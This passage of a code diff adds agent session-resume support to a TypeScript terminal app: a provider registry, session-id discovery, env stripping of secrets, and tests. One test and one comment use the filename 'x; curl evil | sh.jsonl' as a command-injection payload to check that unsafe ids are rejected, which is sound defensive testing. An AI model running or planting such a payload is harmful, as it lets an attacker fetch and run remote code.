+  it("falls back to disk discovery when no stored id", async () => {
+    const res = await r.resolveResume(sess({ agentProvider: "gemini" }));
+    expect(res?.nativeSessionId).toBe("disk-id");
+    expect(res?.resumeFlags).toEqual(["--resume", "disk-id"]);
+  });
+});

--- a/src/infrastructure/container.ts
+++ b/src/infrastructure/container.ts
@@ -84,6 +84,8 @@ import {
 
 // Agent Use Cases
 import { RestartAgentUseCase } from "@/application/use-cases/session/RestartAgentUseCase";
+// [hgwo] Resume resolver for agent session durability (Vault).
+import { AgentResumeResolverImpl } from "@/infrastructure/agent-resume/AgentResumeResolverImpl";
 
 // Update System
 import { DrizzleReleaseRepository } from "./persistence/repositories/DrizzleReleaseRepository";
@@ -263,9 +265,14 @@ export const updateSessionUseCase = new UpdateSessionUseCase(sessionRepository);
  * Restart agent use case.
  * Handles restarting agent CLI processes with environment preservation.
  */
+// [hgwo] Shared resume resolver instance (stateless; reads the declarative
+// per-provider registry + on-disk discovery).
+export const agentResumeResolver = new AgentResumeResolverImpl();
+
 export const restartAgentUseCase = new RestartAgentUseCase(
   sessionRepository,
-  tmuxGateway
+  tmuxGateway,
+  agentResumeResolver
 );
 
 // ─────────────────────────────────────────────────────────────────────────────

--- a/src/lib/agent-resume/__tests__/agent-resume-registry.test.ts
+++ b/src/lib/agent-resume/__tests__/agent-resume-registry.test.ts
@@ -1,0 +1,88 @@
+// @vitest-environment node
+import { describe, it, expect, vi } from "vitest";
+import {
+  AGENT_RESUME_REGISTRY,
+  getResumeSpec,
+  verifyResumeFlag,
+} from "../agent-resume-registry";
+import type { AgentProviderType } from "@/types/session";
+
+const ALL_PROVIDERS: AgentProviderType[] = [
+  "claude",
+  "codex",
+  "gemini",
+  "antigravity",
+  "opencode",
+  "none",
+];
+
+describe("AGENT_RESUME_REGISTRY", () => {
+  it("has a spec for every AgentProviderType", () => {
+    for (const p of ALL_PROVIDERS) {
+      expect(AGENT_RESUME_REGISTRY[p]).toBeDefined();
+      expect(AGENT_RESUME_REGISTRY[p].provider).toBe(p);
+    }
+  });
+
+  it("marks antigravity and none as non-resumable", () => {
+    expect(getResumeSpec("antigravity").supportsResume).toBe(false);
+    expect(getResumeSpec("none").supportsResume).toBe(false);
+    expect(getResumeSpec("antigravity").resume.kind).toBe("none");
+  });
+
+  it("uses --resume flag for claude", () => {
+    const spec = getResumeSpec("claude");
+    expect(spec.supportsResume).toBe(true);
+    expect(spec.resume.kind).toBe("flag");
+    expect(spec.resume.token).toBe("--resume");
+  });
+
+  it("uses a subcommand for codex resume", () => {
+    const spec = getResumeSpec("codex");
+    expect(spec.resume.kind).toBe("subcommand");
+    expect(spec.resume.token).toBe("resume");
+  });
+
+  it("exposes a sessionIdSource and detect for resumable providers", () => {
+    for (const p of ["claude", "codex", "gemini", "opencode"] as AgentProviderType[]) {
+      const spec = getResumeSpec(p);
+      expect(spec.detect.command).toBeTruthy();
+      expect(spec.sessionIdSource).toBeDefined();
+    }
+  });
+
+  it("getResumeSpec falls back to the none spec for unknown providers", () => {
+    // @ts-expect-error — exercising the runtime fallback path with a bad value
+    expect(getResumeSpec("bogus").provider).toBe("none");
+  });
+});
+
+describe("verifyResumeFlag", () => {
+  it("returns true when the CLI --help advertises the token", async () => {
+    vi.resetModules();
+    vi.doMock("@/lib/exec", () => ({
+      execFileNoThrow: vi
+        .fn()
+        .mockResolvedValue({ stdout: "Usage: claude --resume <id>", stderr: "", exitCode: 0 }),
+    }));
+    const { verifyResumeFlag: verify } = await import("../agent-resume-registry");
+    expect(await verify("claude")).toBe(true);
+    vi.doUnmock("@/lib/exec");
+  });
+
+  it("returns false (and warns) when the token is absent", async () => {
+    vi.resetModules();
+    vi.doMock("@/lib/exec", () => ({
+      execFileNoThrow: vi
+        .fn()
+        .mockResolvedValue({ stdout: "Usage: claude [options]", stderr: "", exitCode: 0 }),
+    }));
+    const { verifyResumeFlag: verify } = await import("../agent-resume-registry");
+    expect(await verify("claude")).toBe(false);
+    vi.doUnmock("@/lib/exec");
+  });
+
+  it("returns false for non-resumable providers without probing", async () => {
+    expect(await verifyResumeFlag("antigravity")).toBe(false);
+  });
+});

--- a/src/lib/agent-resume/__tests__/registry-verification.test.ts
+++ b/src/lib/agent-resume/__tests__/registry-verification.test.ts
@@ -1,0 +1,64 @@
+// @vitest-environment node
+import { describe, it, expect, vi, beforeEach } from "vitest";
+
+/**
+ * verifyResumeFlag() probes the installed CLI's `--help` to catch version drift
+ * (e.g. a provider renaming `--resume`). It must (a) return true when the token
+ * is present, (b) return false AND log a warn when absent, and (c) short-circuit
+ * for non-resumable providers without probing.
+ */
+
+const warn = vi.fn();
+const execFileNoThrow = vi.fn();
+
+vi.mock("@/lib/logger", () => ({
+  createLogger: () => ({ warn, info: vi.fn(), error: vi.fn(), debug: vi.fn(), trace: vi.fn() }),
+}));
+vi.mock("@/lib/exec", () => ({
+  execFileNoThrow: (...args: unknown[]) => execFileNoThrow(...args),
+}));
+
+beforeEach(() => {
+  warn.mockClear();
+  execFileNoThrow.mockReset();
+});
+
+describe("verifyResumeFlag", () => {
+  it("returns true when --help advertises the resume token", async () => {
+    execFileNoThrow.mockResolvedValue({
+      stdout: "Usage: claude\n  --resume <id>  Resume a session",
+      stderr: "",
+      exitCode: 0,
+    });
+    const { verifyResumeFlag } = await import("../agent-resume-registry");
+    expect(await verifyResumeFlag("claude")).toBe(true);
+    expect(warn).not.toHaveBeenCalled();
+  });
+
+  it("returns false and warns when the token is missing (drift)", async () => {
+    execFileNoThrow.mockResolvedValue({
+      stdout: "Usage: gemini [options]\n  --help",
+      stderr: "",
+      exitCode: 0,
+    });
+    const { verifyResumeFlag } = await import("../agent-resume-registry");
+    expect(await verifyResumeFlag("gemini")).toBe(false);
+    expect(warn).toHaveBeenCalledTimes(1);
+  });
+
+  it("short-circuits non-resumable providers without probing", async () => {
+    const { verifyResumeFlag } = await import("../agent-resume-registry");
+    expect(await verifyResumeFlag("antigravity")).toBe(false);
+    expect(execFileNoThrow).not.toHaveBeenCalled();
+  });
+
+  it("probes codex with its subcommand token", async () => {
+    execFileNoThrow.mockResolvedValue({
+      stdout: "Commands:\n  resume    Resume a previous session",
+      stderr: "",
+      exitCode: 0,
+    });
+    const { verifyResumeFlag } = await import("../agent-resume-registry");
+    expect(await verifyResumeFlag("codex")).toBe(true);
+  });
+});

--- a/src/lib/agent-resume/__tests__/resume-binding.test.ts
+++ b/src/lib/agent-resume/__tests__/resume-binding.test.ts
@@ -1,0 +1,62 @@
+// @vitest-environment node
+import { describe, it, expect } from "vitest";
+import { stripSensitiveEnv, buildResumeBinding } from "../resume-binding";
+
+describe("stripSensitiveEnv", () => {
+  it("drops secrets but keeps home/dir vars needed for resume", () => {
+    const env = {
+      ANTHROPIC_API_KEY: "sk-secret",
+      GH_TOKEN: "ghp_x",
+      OPENAI_API_KEY: "sk-openai",
+      CLAUDE_CONFIG_DIR: "/p/.config",
+      HOME: "/home/u",
+      FOO_PASSWORD: "p",
+      AWS_SESSION_TOKEN: "aws",
+      GITHUB_AUTH: "auth-val",
+      CODEX_HOME: "/p/.codex",
+      XDG_CONFIG_HOME: "/p/xdg",
+    };
+    const out = stripSensitiveEnv(env);
+    expect(out.ANTHROPIC_API_KEY).toBeUndefined();
+    expect(out.GH_TOKEN).toBeUndefined();
+    expect(out.OPENAI_API_KEY).toBeUndefined();
+    expect(out.FOO_PASSWORD).toBeUndefined();
+    expect(out.AWS_SESSION_TOKEN).toBeUndefined();
+    expect(out.GITHUB_AUTH).toBeUndefined();
+    // kept — needed to locate resume session files
+    expect(out.CLAUDE_CONFIG_DIR).toBe("/p/.config");
+    expect(out.HOME).toBe("/home/u");
+    expect(out.CODEX_HOME).toBe("/p/.codex");
+    expect(out.XDG_CONFIG_HOME).toBe("/p/xdg");
+  });
+
+  it("drops everything not explicitly safe (allowlist beats denylist)", () => {
+    const out = stripSensitiveEnv({ SOME_RANDOM_VAR: "v", PATH: "/usr/bin" });
+    // PATH and arbitrary vars are not in the allowlist → dropped.
+    expect(out.SOME_RANDOM_VAR).toBeUndefined();
+    expect(out.PATH).toBeUndefined();
+  });
+});
+
+describe("buildResumeBinding", () => {
+  it("captures flags + sanitized env + provider + timestamp", () => {
+    const b = buildResumeBinding(
+      { provider: "claude", resumeFlags: ["--resume", "abc"], argvOverride: null },
+      { ANTHROPIC_API_KEY: "sk", HOME: "/h" },
+    );
+    expect(b.resumeFlags).toEqual(["--resume", "abc"]);
+    expect(b.argvOverride).toBeNull();
+    expect(b.env.ANTHROPIC_API_KEY).toBeUndefined();
+    expect(b.env.HOME).toBe("/h");
+    expect(b.provider).toBe("claude");
+    expect(typeof b.capturedAt).toBe("string");
+  });
+
+  it("preserves a codex argv override", () => {
+    const b = buildResumeBinding(
+      { provider: "codex", resumeFlags: [], argvOverride: ["codex", "resume", "cx"] },
+      {},
+    );
+    expect(b.argvOverride).toEqual(["codex", "resume", "cx"]);
+  });
+});

--- a/src/lib/agent-resume/__tests__/session-id-discovery.test.ts
+++ b/src/lib/agent-resume/__tests__/session-id-discovery.test.ts
@@ -1,0 +1,106 @@
+// @vitest-environment node
+import { describe, it, expect, vi, beforeEach } from "vitest";
+
+// Mock the fs module the discovery uses for the generic (non-claude) path.
+const readdir = vi.fn();
+const stat = vi.fn();
+vi.mock("node:fs/promises", () => ({
+  readdir: (...args: unknown[]) => readdir(...args),
+  stat: (...args: unknown[]) => stat(...args),
+}));
+
+// Mock the claude streaming parser delegate.
+const listSessions = vi.fn();
+vi.mock("@/services/claude-session-service", () => ({
+  listSessions: (...args: unknown[]) => listSessions(...args),
+}));
+
+import {
+  discoverLatestSessionId,
+  listSessionIds,
+} from "../session-id-discovery";
+
+beforeEach(() => {
+  readdir.mockReset();
+  stat.mockReset();
+  listSessions.mockReset();
+});
+
+describe("discoverLatestSessionId — generic providers", () => {
+  it("returns the newest file stem under CODEX_HOME for codex", async () => {
+    readdir.mockResolvedValue(["old.jsonl", "newest.jsonl"]);
+    stat.mockImplementation((p: string) =>
+      Promise.resolve({ mtimeMs: p.includes("newest") ? 2000 : 1000 }),
+    );
+
+    const id = await discoverLatestSessionId("codex", "/proj", { CODEX_HOME: "/fake/codex" });
+    expect(id).toBe("newest");
+    expect(readdir).toHaveBeenCalledWith("/fake/codex");
+  });
+
+  it("strips json/jsonl extensions to recover the bare native id", async () => {
+    readdir.mockResolvedValue(["abc-123.json"]);
+    stat.mockResolvedValue({ mtimeMs: 5 });
+    const id = await discoverLatestSessionId("gemini", "/proj", { GEMINI_HOME: "/g" });
+    expect(id).toBe("abc-123");
+  });
+
+  it("returns null for antigravity (no resume support)", async () => {
+    const id = await discoverLatestSessionId("antigravity", "/proj", {});
+    expect(id).toBeNull();
+    expect(readdir).not.toHaveBeenCalled();
+  });
+
+  it("returns null when the provider dir cannot be read", async () => {
+    readdir.mockRejectedValue(new Error("ENOENT"));
+    const id = await discoverLatestSessionId("opencode", "/proj", { OPENCODE_HOME: "/missing" });
+    expect(id).toBeNull();
+  });
+
+  it("rejects a shell-injecting id and relaunches fresh (defense-in-depth)", async () => {
+    // A maliciously-named session file would be typed into a tmux send-keys
+    // prompt; its stem contains spaces/`;`/`|` → must be skipped, not resumed.
+    readdir.mockResolvedValue(["x; curl evil | sh.jsonl"]);
+    stat.mockResolvedValue({ mtimeMs: 100 });
+    const id = await discoverLatestSessionId("codex", "/proj", { CODEX_HOME: "/c" });
+    expect(id).toBeNull();
+  });
+
+  it("skips unsafe ids but still returns a newer safe one", async () => {
+    readdir.mockResolvedValue(["bad name$.jsonl", "good-id-1.jsonl"]);
+    // The unsafe file is newest; the safe one is older. Filtering must drop the
+    // unsafe entry and fall through to the safe id rather than returning null.
+    stat.mockImplementation((p: string) =>
+      Promise.resolve({ mtimeMs: p.includes("bad") ? 200 : 100 }),
+    );
+    const id = await discoverLatestSessionId("codex", "/proj", { CODEX_HOME: "/c" });
+    expect(id).toBe("good-id-1");
+  });
+});
+
+describe("discoverLatestSessionId — claude delegates to listSessions", () => {
+  it("uses the streaming parser and returns its newest sessionId", async () => {
+    listSessions.mockResolvedValue([
+      { sessionId: "claude-uuid-1", lastModified: "2026-06-03T00:00:00.000Z" },
+    ]);
+    const id = await discoverLatestSessionId("claude", "/proj", {
+      CLAUDE_CONFIG_DIR: "/profiles/p1/.config",
+    });
+    expect(id).toBe("claude-uuid-1");
+    expect(listSessions).toHaveBeenCalledWith("/proj", {
+      limit: 1,
+      profileConfigDir: "/profiles/p1/.config",
+    });
+  });
+});
+
+describe("listSessionIds", () => {
+  it("returns newest-first list for generic providers", async () => {
+    readdir.mockResolvedValue(["a.jsonl", "b.jsonl", "c.jsonl"]);
+    stat.mockImplementation((p: string) =>
+      Promise.resolve({ mtimeMs: p.includes("a") ? 30 : p.includes("b") ? 20 : 10 }),
+    );
+    const list = await listSessionIds("codex", "/proj", { CODEX_HOME: "/c" }, 2);
+    expect(list.map((s) => s.sessionId)).toEqual(["a", "b"]);
+  });
+});

--- a/src/lib/agent-resume/agent-resume-registry.ts
+++ b/src/lib/agent-resume/agent-resume-registry.ts
@@ -1,0 +1,160 @@
+/**
+ * Declarative per-provider resume registry (cmux.json-style data, no behavior).
+ *
+ * This is the SINGLE SOURCE OF TRUTH for how each agent provider resumes a
+ * conversation. The resolver (`AgentResumeResolverImpl`) and on-disk discovery
+ * (`session-id-discovery.ts`) read from here; there is no inline provider
+ * `switch` in the launch paths.
+ *
+ * Asymmetry note: Claude pushes its native session id via the Stop hook (see
+ * `crates/rdv/src/commands/hook.rs`) so capture is real-time. Codex / Gemini /
+ * OpenCode have no hook system today, so they rely on **disk discovery** at
+ * relaunch (newest session file under the provider's profile-isolated home dir).
+ * Antigravity has no confirmed resume mechanism and is treated as no-resume
+ * (graceful fresh relaunch).
+ *
+ * Provider flag spelling is version-dependent. `verifyResumeFlag()` probes the
+ * installed CLI's `--help` at startup diagnostics to catch drift; if a token is
+ * missing the registry should be adjusted (not the resolver).
+ */
+
+import type { AgentProviderType } from "@/types/session";
+import type { ResumeTemplate } from "@/types/agent-resume";
+import { execFileNoThrow } from "@/lib/exec";
+import { createLogger } from "@/lib/logger";
+
+const log = createLogger("AgentResumeRegistry");
+
+/** Where a provider's native session ids live on disk, for discovery. */
+export interface SessionIdSource {
+  /** Env var holding the CLI home dir (profile-isolated), or null. */
+  homeEnvVar: string | null;
+  /** Relative-to-$HOME default path when the env var is unset. */
+  defaultHomeSubpath: string;
+  /** Extension(s) stripped from the newest file's name to recover the bare id. */
+  fileExtensions: string[];
+  /** Whether the native id is the filename stem or read from inside the file. */
+  idFrom: "filename" | "header.id" | "header.sessionId";
+}
+
+export interface ProviderResumeSpec {
+  provider: AgentProviderType;
+  supportsResume: boolean;
+  /** How we detect the CLI is present (used by verification + UI). */
+  detect: { command: string; versionArgs: string[] };
+  /** Where native ids live, for disk discovery. */
+  sessionIdSource: SessionIdSource;
+  resume: ResumeTemplate;
+}
+
+export const AGENT_RESUME_REGISTRY: Record<AgentProviderType, ProviderResumeSpec> = {
+  claude: {
+    provider: "claude",
+    supportsResume: true,
+    detect: { command: "claude", versionArgs: ["--version"] },
+    sessionIdSource: {
+      homeEnvVar: "CLAUDE_CONFIG_DIR",
+      defaultHomeSubpath: ".claude/projects",
+      fileExtensions: ["jsonl"],
+      idFrom: "filename",
+    },
+    resume: { kind: "flag", token: "--resume" },
+  },
+  codex: {
+    provider: "codex",
+    supportsResume: true,
+    detect: { command: "codex", versionArgs: ["--version"] },
+    sessionIdSource: {
+      homeEnvVar: "CODEX_HOME",
+      defaultHomeSubpath: ".codex/sessions",
+      fileExtensions: ["jsonl", "json"],
+      idFrom: "filename",
+    },
+    // Codex resume is a SUBCOMMAND (`codex resume <id>`), not a flag.
+    resume: { kind: "subcommand", token: "resume" },
+  },
+  gemini: {
+    provider: "gemini",
+    supportsResume: true,
+    detect: { command: "gemini", versionArgs: ["--version"] },
+    sessionIdSource: {
+      homeEnvVar: "GEMINI_HOME",
+      defaultHomeSubpath: ".gemini/tmp",
+      fileExtensions: ["json", "jsonl"],
+      idFrom: "filename",
+    },
+    resume: { kind: "flag", token: "--resume" },
+  },
+  opencode: {
+    provider: "opencode",
+    supportsResume: true,
+    detect: { command: "opencode", versionArgs: ["--version"] },
+    sessionIdSource: {
+      homeEnvVar: "OPENCODE_HOME",
+      defaultHomeSubpath: ".local/share/opencode",
+      fileExtensions: ["json", "jsonl"],
+      idFrom: "filename",
+    },
+    resume: { kind: "flag", token: "--session" },
+  },
+  antigravity: {
+    provider: "antigravity",
+    supportsResume: false,
+    detect: { command: "agy", versionArgs: ["--version"] },
+    sessionIdSource: {
+      homeEnvVar: null,
+      defaultHomeSubpath: "",
+      fileExtensions: [],
+      idFrom: "filename",
+    },
+    resume: { kind: "none" },
+  },
+  none: {
+    provider: "none",
+    supportsResume: false,
+    detect: { command: "", versionArgs: [] },
+    sessionIdSource: {
+      homeEnvVar: null,
+      defaultHomeSubpath: "",
+      fileExtensions: [],
+      idFrom: "filename",
+    },
+    resume: { kind: "none" },
+  },
+};
+
+/** Look up a provider's resume spec, defaulting to the no-resume `none` spec. */
+export function getResumeSpec(p: AgentProviderType): ProviderResumeSpec {
+  return AGENT_RESUME_REGISTRY[p] ?? AGENT_RESUME_REGISTRY.none;
+}
+
+/**
+ * Verify the installed CLI actually advertises the registry's resume token.
+ *
+ * Runs `<command> --help` and checks the help text contains the token. Used at
+ * startup diagnostics (NOT on the hot path) to catch version drift, e.g. a
+ * provider renaming `--resume`. Returns false (and logs a warn) when the token
+ * is absent so callers can fall back to a fresh relaunch.
+ */
+export async function verifyResumeFlag(
+  provider: AgentProviderType,
+  env: Record<string, string> = {},
+): Promise<boolean> {
+  const spec = getResumeSpec(provider);
+  if (!spec.supportsResume || !spec.resume.token) return false;
+
+  const result = await execFileNoThrow(spec.detect.command, ["--help"], {
+    timeout: 4000,
+    env: { ...process.env, ...env },
+  });
+  const help = `${result.stdout}\n${result.stderr}`;
+  const ok = help.includes(spec.resume.token);
+  if (!ok) {
+    log.warn("Resume token not advertised by CLI --help; resume may fall back to fresh", {
+      provider,
+      token: spec.resume.token,
+      command: spec.detect.command,
+    });
+  }
+  return ok;
+}

--- a/src/lib/agent-resume/resume-binding.ts
+++ b/src/lib/agent-resume/resume-binding.ts
@@ -1,0 +1,80 @@
+/**
+ * Durable resume binding: the resume *intent* (flags + sanitized env) persisted
+ * on the session so a recreate (terminal-server restart, pod restart) can
+ * relaunch the agent even though the in-memory id map and original env are gone.
+ *
+ * SECURITY (Vault threat model): never persist plaintext secrets. We strip the
+ * env with an allowlist-beats-denylist policy — only env vars genuinely needed
+ * to LOCATE the resume session files (CLI home dirs, XDG paths) are kept; API
+ * keys / tokens / passwords are dropped. A pod-restart relaunch therefore
+ * resumes the *conversation* but relies on the agent's own credential store for
+ * secrets.
+ */
+
+import type { ResumeBinding, ResumeResolution } from "@/types/agent-resume";
+
+/** Substrings (case-insensitive) that mark an env var as secret and unstorable. */
+const SENSITIVE_PATTERNS = [
+  "TOKEN",
+  "SECRET",
+  "KEY",
+  "PASSWORD",
+  "PASSWD",
+  "CREDENTIAL",
+  "PRIVATE",
+  "AUTH",
+  "AWS_",
+  "SESSION_TOKEN",
+];
+
+/**
+ * Env vars we DO keep — needed to find the resume session dir on recreate.
+ * Allowlist wins over the denylist (e.g. CLAUDE_CONFIG_DIR contains no secret
+ * despite not matching, and is required to locate the profile-isolated history).
+ */
+const SAFE_ALLOWLIST = new Set([
+  "HOME",
+  "TERM",
+  "CLAUDE_CONFIG_DIR",
+  "CODEX_HOME",
+  "GEMINI_HOME",
+  "OPENCODE_HOME",
+  "XDG_CONFIG_HOME",
+  "XDG_DATA_HOME",
+  "XDG_STATE_HOME",
+  "XDG_CACHE_HOME",
+  "RDV_SESSION_ID",
+  "RDV_TERMINAL_PORT",
+]);
+
+/**
+ * Strip sensitive env vars, keeping only the allowlisted dir-pointer vars.
+ * Allowlist beats denylist; everything not explicitly safe is dropped.
+ */
+export function stripSensitiveEnv(env: Record<string, string>): Record<string, string> {
+  const out: Record<string, string> = {};
+  for (const [k, v] of Object.entries(env)) {
+    if (SAFE_ALLOWLIST.has(k)) {
+      out[k] = v;
+      continue;
+    }
+    const upper = k.toUpperCase();
+    if (SENSITIVE_PATTERNS.some((p) => upper.includes(p))) continue; // drop secret
+    // Drop everything not explicitly safe — allowlist beats denylist for resume.
+  }
+  return out;
+}
+
+/** Build a durable resume binding from a resolution + the launch env. */
+export function buildResumeBinding(
+  resolution: Pick<ResumeResolution, "provider" | "resumeFlags" | "argvOverride">,
+  env: Record<string, string>,
+): ResumeBinding {
+  return {
+    provider: resolution.provider,
+    resumeFlags: resolution.resumeFlags,
+    argvOverride: resolution.argvOverride,
+    env: stripSensitiveEnv(env),
+    capturedAt: new Date().toISOString(),
+  };
+}

--- a/src/lib/agent-resume/session-id-discovery.ts
+++ b/src/lib/agent-resume/session-id-discovery.ts
@@ -1,0 +1,130 @@
+/**
+ * Per-provider on-disk native session-id discovery (profile-env aware).
+ *
+ * Used as the fallback when no native id was captured into the DB (Codex /
+ * Gemini / OpenCode have no push-capture hook), and to power the multi-provider
+ * resume picker. Pure fs reads — no DB, no tmux.
+ *
+ * Claude reuses the proven streaming parser in `claude-session-service.ts`
+ * (keyed by `encodePath(cwd)`); the other providers use a generic "newest file
+ * by mtime under the provider's home dir" heuristic. Per-provider behavior is
+ * driven by the declarative registry, not inline branching.
+ */
+
+import { join } from "node:path";
+import { homedir } from "node:os";
+import { readdir, stat } from "node:fs/promises";
+import type { AgentProviderType } from "@/types/session";
+import { getResumeSpec } from "./agent-resume-registry";
+import { listSessions } from "@/services/claude-session-service";
+
+/** One discovered native session id with its last-modified time. */
+export interface DiscoveredSessionId {
+  sessionId: string;
+  lastModified: string; // ISO
+}
+
+/** Resolve the provider's session-storage dir from the (profile-isolated) env. */
+function resolveHomeDir(
+  provider: AgentProviderType,
+  env: Record<string, string>,
+): string | null {
+  const spec = getResumeSpec(provider);
+  if (!spec.supportsResume) return null;
+  const { homeEnvVar, defaultHomeSubpath } = spec.sessionIdSource;
+  if (homeEnvVar && env[homeEnvVar]) return env[homeEnvVar];
+  if (!defaultHomeSubpath) return null;
+  return join(env.HOME ?? homedir(), defaultHomeSubpath);
+}
+
+/** Strip a single known extension from a filename to recover the bare native id. */
+function stripExtension(name: string, exts: string[]): string {
+  for (const ext of exts) {
+    const suffix = `.${ext}`;
+    if (name.toLowerCase().endsWith(suffix.toLowerCase())) {
+      return name.slice(0, name.length - suffix.length);
+    }
+  }
+  return name;
+}
+
+/**
+ * [hgwo] Defense-in-depth: a discovered id (a readdir filename stem for
+ * codex/gemini/opencode) is later typed into the shell prompt via
+ * `tmux send-keys -l <cmd>` + `C-m`, so a session file named e.g.
+ * `x; curl evil | sh.jsonl` would inject a command. The discovery dir is the
+ * user's own profile-isolated home (low likelihood), but we still reject any id
+ * with shell-significant characters — only `[A-Za-z0-9._-]` is allowed. Claude's
+ * UUIDs and the providers' opaque ids pass; a non-matching id is skipped so the
+ * caller relaunches FRESH instead of resuming with an unsafe id.
+ */
+const SAFE_SESSION_ID = /^[A-Za-z0-9._-]+$/;
+
+function isSafeSessionId(id: string): boolean {
+  return id.length > 0 && SAFE_SESSION_ID.test(id);
+}
+
+/**
+ * List native session ids for a provider+cwd, newest first.
+ *
+ * For Claude this delegates to the streaming parser (cwd-aware). For the
+ * generic providers it lists files under the provider's home dir sorted by
+ * mtime. Returns at most `limit` entries (default 20).
+ */
+export async function listSessionIds(
+  provider: AgentProviderType,
+  cwd: string,
+  env: Record<string, string>,
+  limit = 20,
+): Promise<DiscoveredSessionId[]> {
+  if (provider === "claude") {
+    // listSessions joins ".claude" itself, so pass the bare config dir.
+    const configDir = env.CLAUDE_CONFIG_DIR;
+    const sessions = await listSessions(cwd, { limit, profileConfigDir: configDir });
+    // Claude ids are UUIDs (safe); filter anyway for a single uniform guard.
+    return sessions
+      .map((s) => ({ sessionId: s.sessionId, lastModified: s.lastModified }))
+      .filter((entry) => isSafeSessionId(entry.sessionId));
+  }
+
+  const dir = resolveHomeDir(provider, env);
+  if (!dir) return [];
+  const spec = getResumeSpec(provider);
+
+  try {
+    const entries = await readdir(dir);
+    const withMtime = await Promise.all(
+      entries.map(async (name) => {
+        try {
+          return { name, mtime: (await stat(join(dir, name))).mtimeMs };
+        } catch {
+          return { name, mtime: 0 };
+        }
+      }),
+    );
+    withMtime.sort((a, b) => b.mtime - a.mtime);
+    return withMtime
+      .map(({ name, mtime }) => ({
+        sessionId: stripExtension(name, spec.sessionIdSource.fileExtensions),
+        lastModified: new Date(mtime).toISOString(),
+      }))
+      // Drop ids with shell-significant characters before they can reach a tmux
+      // send-keys prompt line (defense-in-depth — see isSafeSessionId).
+      .filter((entry) => isSafeSessionId(entry.sessionId))
+      .slice(0, limit);
+  } catch {
+    return [];
+  }
+}
+
+/** Newest native session id for the given provider+cwd, or null. */
+export async function discoverLatestSessionId(
+  provider: AgentProviderType,
+  cwd: string,
+  env: Record<string, string>,
+): Promise<string | null> {
+  const spec = getResumeSpec(provider);
+  if (!spec.supportsResume) return null;
+  const [latest] = await listSessionIds(provider, cwd, env, 1);
+  return latest?.sessionId ?? null;
+}

--- a/src/lib/terminal-plugins/plugins/__tests__/agent-plugin-server.resume.test.ts
+++ b/src/lib/terminal-plugins/plugins/__tests__/agent-plugin-server.resume.test.ts
@@ -1,0 +1,57 @@
+// @vitest-environment node
+import { describe, it, expect } from "vitest";
+import { createAgentServerPlugin } from "../agent-plugin-server";
+import type { TerminalSession } from "@/types/session";
+
+const plugin = createAgentServerPlugin();
+
+const session = (over: {
+  agentProvider?: TerminalSession["agentProvider"];
+  typeMetadata?: Record<string, unknown> | null;
+}): TerminalSession =>
+  ({
+    id: "s1",
+    userId: "u1",
+    name: "Agent",
+    tmuxSessionName: "rdv-s1",
+    projectPath: "/p",
+    terminalType: "agent",
+    agentProvider: over.agentProvider ?? "claude",
+    typeMetadata: over.typeMetadata ?? null,
+  }) as unknown as TerminalSession;
+
+/**
+ * [hgwo] onSessionRestart is intentionally INERT for resume: it returns the bare
+ * provider command and ignores any resumeBinding. The live restart paths (HTTP
+ * RestartAgentUseCase, WS restart_agent / relaunchAgentInTmux) own resume via
+ * the AgentResumeResolver. These tests lock that contract so the dead path
+ * cannot silently start relaunching with the wrong (original-launch) flags.
+ */
+describe("agent-plugin-server onSessionRestart — inert (no resume here)", () => {
+  it("returns the bare command and ignores a resumeBinding.resumeFlags", async () => {
+    const cfg = await plugin.onSessionRestart!(
+      session({ typeMetadata: { resumeBinding: { resumeFlags: ["--resume", "x"] } } }),
+    );
+    expect(cfg?.shellCommand).toBe("claude");
+  });
+
+  it("returns the bare command and ignores a resumeBinding.argvOverride (codex)", async () => {
+    const cfg = await plugin.onSessionRestart!(
+      session({
+        agentProvider: "codex",
+        typeMetadata: { resumeBinding: { argvOverride: ["codex", "resume", "cx"] } },
+      }),
+    );
+    expect(cfg?.shellCommand).toBe("codex");
+  });
+
+  it("returns the bare command when there is no binding", async () => {
+    const cfg = await plugin.onSessionRestart!(session({ typeMetadata: null }));
+    expect(cfg?.shellCommand).toBe("claude");
+  });
+
+  it("returns null for a none provider", async () => {
+    const cfg = await plugin.onSessionRestart!(session({ agentProvider: "none" }));
+    expect(cfg).toBeNull();
+  });
+});

--- a/src/lib/terminal-plugins/plugins/agent-plugin-client.tsx
+++ b/src/lib/terminal-plugins/plugins/agent-plugin-client.tsx
@@ -131,6 +131,7 @@ function AgentExitScreenAdapter({
       restartCount={session.agentRestartCount ?? 0}
       onRestart={onRestart}
       onClose={onClose}
+      agentProvider={session.agentProvider}
     />
   );
 }

--- a/src/lib/terminal-plugins/plugins/agent-plugin-server.ts
+++ b/src/lib/terminal-plugins/plugins/agent-plugin-server.ts
@@ -115,11 +115,17 @@ export function createAgentServerPlugin(
 
       if (!provider || provider.id === "none") return null;
 
-      const agentCommand = buildAgentCommand(
-        provider,
-        [],
-        config.allowDangerousFlags
-      );
+      // [hgwo] Resume is intentionally NOT handled here. This hook is inert for
+      // launch purposes: `markAgentRestarting` only existence-checks the config,
+      // and the live restart paths route elsewhere — the HTTP
+      // `RestartAgentUseCase` and the WS `restart_agent` / cold-attach
+      // `relaunchAgentInTmux`, both of which resolve resume via the
+      // AgentResumeResolver + registry. A prior version read
+      // `typeMetadata.resumeBinding.resumeFlags` here, but that binding stores
+      // the ORIGINAL launch flags (e.g. `--dangerously-skip-permissions`), not a
+      // `--resume` flag — so wiring it in would have relaunched FRESH with the
+      // original flags, never resuming. Keep this returning the bare command.
+      const agentCommand = buildAgentCommand(provider, [], config.allowDangerousFlags);
 
       return {
         shellCommand: agentCommand,

--- a/src/server/__tests__/agent-relaunch.test.ts
+++ b/src/server/__tests__/agent-relaunch.test.ts
@@ -1,0 +1,190 @@
+// @vitest-environment node
+import { describe, it, expect, vi, beforeEach } from "vitest";
+
+/**
+ * agent-relaunch.ts is the single recreate-site relaunch helper. It uses
+ * node:child_process execFile (promisified) for tmux set-environment +
+ * send-keys, and dynamically imports @/db + SessionMapper + the resolver.
+ *
+ * We mock node:child_process so execFile invokes its callback (promisify
+ * resolves), and capture every tmux invocation. The @/db row + resolver are
+ * doMock'd per case (resetModules first) because the helper imports them
+ * dynamically inside the function body.
+ */
+
+// Capture every tmux call. execFile(cmd, args, cb) → cb(null, {stdout,stderr}).
+const execFileCalls: string[][] = [];
+const execFile = vi.fn(
+  (_cmd: string, args: string[], cb: (e: unknown, r: unknown) => void) => {
+    execFileCalls.push(args);
+    cb(null, { stdout: "", stderr: "" });
+  },
+);
+vi.mock("node:child_process", () => ({ execFile }));
+
+beforeEach(() => {
+  execFileCalls.length = 0;
